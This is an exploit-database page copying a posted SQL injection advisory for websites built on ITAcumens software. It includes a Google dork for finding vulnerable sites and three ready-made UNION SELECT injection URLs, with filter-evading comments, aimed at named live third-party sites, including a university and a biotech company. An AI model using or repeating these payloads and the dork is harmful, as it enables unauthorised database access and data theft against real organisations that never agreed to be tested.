Advertisement






ITAcumens - Sql Injection Vulnerability

CVE Category Price Severity
N/A CWE-89 Not specified High
Author Risk Exploitation Type Date
Exploit Alert Team High Remote 2023-09-13
CVSS
CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:H/I:H/A:H

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2023090043

Below is a copy:

ITAcumens - Sql Injection Vulnerability
*********************************************************
#Exploit Title: ITAcumens - Sql Injection Vulnerability
#Date: 2023-09-11
#Exploit Author: Behrouz Mansoori
#Google Dork: "Powered by ITAcumens"
#Category:webapps
#Tested On: Mac, Firefox
Proof of Concept:
### Demo :
https://tnjfu.ac.in/cofenag/news-read-more.php?id=-607%20/*!12345union*/%20select%201,version(),3,4,5,6,7,8--
https://cftichennai.in/classroom.php?id=-1%27%20/*!12345union*/%20select%201,2,3,version(),5,6--+
https://www.aabiotech.in/products-detail.php?id=-33%27%20/*!12345UNION*/%20SELECT%201,2,3,4,5,6,7,8,9,version(),11,12,13,14,15,16,17,18,19,20,21,22,23,24--+
*********************************************************
#Discovered by: Behrouz mansoori
#Instagram: Behrouz_mansoori
#Email: [email protected]
*********************************************************

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.